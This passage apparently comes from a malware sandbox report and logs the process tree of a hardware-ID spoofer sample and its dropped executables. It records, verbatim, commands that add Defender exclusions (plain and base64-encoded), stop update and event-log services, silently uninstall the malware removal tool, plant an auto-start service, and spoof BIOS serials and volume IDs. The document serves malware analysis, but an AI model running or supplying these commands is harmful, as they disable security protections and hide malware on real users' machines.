    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 4L7D-FKPI
        5⤵
        
        PID:6204
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: A35M-SNS3
      4⤵
      PID:2840
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: A35M-SNS3
        5⤵
        
        PID:1888
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: F9LO-EP25
      4⤵
      PID:4684
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: F9LO-EP25
        5⤵
        
        PID:4540
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
      4⤵
      PID:6960
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
      4⤵
      PID:368
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
      4⤵
      PID:4760
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
      4⤵
      PID:4688
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
      4⤵
      PID:1672
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
      4⤵
      PID:3224
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
      4⤵
      PID:3808
- - C:\Users\Admin\AppData\Roaming\conhost_sft.exe
    "C:\Users\Admin\AppData\Roaming\conhost_sft.exe"
    3⤵
    - Executes dropped EXE
    PID:6548
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      PID:5528
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:6456
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:6452
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:6876
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:6944
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:164
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:4864
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:1108
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "driverupdate"
      4⤵
      Launches sc.exe
      PID:4796
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:4132
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:5032
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:1408
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:3848
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:5236
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "driverupdate"
      4⤵
      Launches sc.exe
      PID:304
- C:\Users\Admin\AppData\Local\Temp\7zO0F561D3B\sync_spoofer.exe
  "C:\Users\Admin\AppData\Local\Temp\7zO0F561D3B\sync_spoofer.exe"
  2⤵
  PID:7084
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAeABzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AZABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAdABkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AbQB4ACMAPgA="
    3⤵
    PID:7128
- - C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
    "C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"
    3⤵
    PID:3884
- - C:\Users\Admin\AppData\Roaming\conhost_sft.exe
    "C:\Users\Admin\AppData\Roaming\conhost_sft.exe"
    3⤵
    PID:1192
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      PID:5732
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:6992
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:4132
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:5692
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:4760
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:7020
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:2688
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:240
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:3680
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "driverupdate"
      4⤵
      Launches sc.exe
      PID:4652
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:3080
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:5972
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:856
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:3224
- - C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
    "C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
    3⤵
    PID:4376
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 41U9-D281
      4⤵
      PID:948
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 41U9-D281
        5⤵
        
        PID:6228
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\SPOOFED2.bat
      4⤵
      PID:6748
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
      4⤵
      PID:1108
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
        5⤵
        
        PID:4676
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
        5⤵
        
        PID:6552
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
        5⤵
        
        PID:6540
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
        5⤵
        
        PID:4696
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
        5⤵
        
        PID:1420
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
        5⤵
        
        PID:3520
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
        5⤵
        
        PID:6380
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
        5⤵
        
        PID:6344
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
        5⤵
        
        PID:6368
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
        5⤵
        
        PID:4256
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
        5⤵
        
        PID:6316
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3996
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
        5⤵
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious use of AdjustPrivilegeToken
        
        PID:4960
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
        5⤵
        
        PID:1008
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
        5⤵
        
        PID:6948
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
      4⤵
      PID:6348
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 6723HP-TRGT20584AB
        5⤵
        
        PID:2056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
      4⤵
      PID:1092
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 26723HP-TRGT20584RV
        5⤵
        
        PID:4420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
      4⤵
      PID:2972
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 86723HP-TRGT20584SG
        5⤵
        
        PID:1264
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
      4⤵
      PID:5852
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        5⤵
        
        PID:6752
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
      4⤵
      PID:6400
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 56723HP-TRGT20584SL
        5⤵
        
        PID:2488
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
      4⤵
      PID:1388
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 46723HP-TRGT20584FA
        5⤵
        
        PID:4844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
      4⤵
      PID:6860
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 66723HP-TRGT20584FU
        5⤵
        
        PID:6824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
      4⤵
      PID:1076
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 36723HP-TRGT20584DQ
        5⤵
        
        PID:7124
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
      4⤵
      PID:6360
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 76723HP-TRGT20584MST
        5⤵
        
        PID:6832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
      4⤵
      PID:6744
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        5⤵
        
        PID:2384
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
      4⤵
      PID:6680
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 6739HP-TRGT8790AB
        5⤵
        
        PID:1576
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
      4⤵
      PID:1536
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 26739HP-TRGT8790RV
        5⤵
        
        PID:1776
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
      4⤵
      PID:3900
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 86739HP-TRGT8790SG
        5⤵
        
        PID:5784
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
      4⤵
      PID:5056
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 56743HP-TRGT19538SL
        5⤵
        
        PID:4648
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
      4⤵
      PID:6632
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 46743HP-TRGT19538FA
        5⤵
        
        PID:5736
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
      4⤵
      PID:2812
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 66743HP-TRGT19538FU
        5⤵
        
        PID:6684
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
      4⤵
      PID:6724
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 36743HP-TRGT19538DQ
        5⤵
        
        PID:6988
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
      4⤵
      PID:6688
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 76743HP-TRGT19538MST
        5⤵
        
        PID:212
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
      4⤵
      PID:4452
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        5⤵
        
        PID:5504
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
      4⤵
      PID:6864
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
      4⤵
      PID:4208
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 6759HP-TRGT7744AB
        5⤵
        
        PID:4864
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
      4⤵
      PID:6036
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 26759HP-TRGT7744RV
        5⤵
        
        PID:2648
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
      4⤵
      PID:6816
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        5⤵
        
        PID:3436
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
      4⤵
      PID:6448
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 56759HP-TRGT7744SL
        5⤵
        
        PID:3848
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
      4⤵
      PID:1304
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 86759HP-TRGT7744SG
        5⤵
        
        PID:2936
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
      4⤵
      PID:5996
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 46759HP-TRGT7744FA
        5⤵
        
        PID:4332
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
      4⤵
      PID:6988
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 66759HP-TRGT7744FU
        5⤵
        
        PID:3068
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
      4⤵
      PID:1472
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 36759HP-TRGT7744DQ
        5⤵
        
        PID:6960
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
      4⤵
      PID:6944
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 76759HP-TRGT7744MST
        5⤵
        
        PID:6876
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
      4⤵
      PID:2840
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        5⤵
        
        PID:3412
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: B2V0-RIZB
      4⤵
      PID:7000
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: B2V0-RIZB
        5⤵
        
        PID:1096
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: UMSV-PZMV
      4⤵
      PID:5088
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: UMSV-PZMV
        5⤵
        
        PID:6336
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 84KC-4O6J
      4⤵
      PID:228
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 84KC-4O6J
        5⤵
        
        PID:400
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: H49H-AB3S
      4⤵
      PID:1648
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: H49H-AB3S
        5⤵
        
        PID:6828
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: HPO6-7JU4
      4⤵
      PID:6032
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: HPO6-7JU4
        5⤵
        
        PID:2212
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: KFB0-3JOE
      4⤵
      PID:3048
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: KFB0-3JOE
        5⤵
        
        PID:3888
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: UVJF-CN7P
      4⤵
      PID:2120
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: UVJF-CN7P
        5⤵
        
        PID:3376
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: RBFK-7325
      4⤵
      PID:1712
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: RBFK-7325
        5⤵
        
        PID:5064
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: SD36-KT7T
      4⤵
      PID:6872
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: SD36-KT7T
        5⤵
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        
        PID:3996
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: M960-H961
      4⤵
      PID:6740
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: M960-H961
        5⤵
        
        PID:6800
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: PHPT-ZJE8
      4⤵
      PID:1296
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: PHPT-ZJE8
        5⤵
        
        PID:2972
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: G4FE-1GND
      4⤵
      PID:6100
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: G4FE-1GND
        5⤵
        
        PID:2312
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 578R-NOJO
      4⤵
      PID:1068
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 578R-NOJO
        5⤵
        
        PID:3020
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: J75J-R7G1
      4⤵
      PID:6628
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: J75J-R7G1
        5⤵
        
        PID:3300
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: S5JZ-DIBL
      4⤵
      PID:60
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: S5JZ-DIBL
        5⤵
        
        PID:3496
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: FS7L-35OV
      4⤵
      PID:3320
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: FS7L-35OV
        5⤵
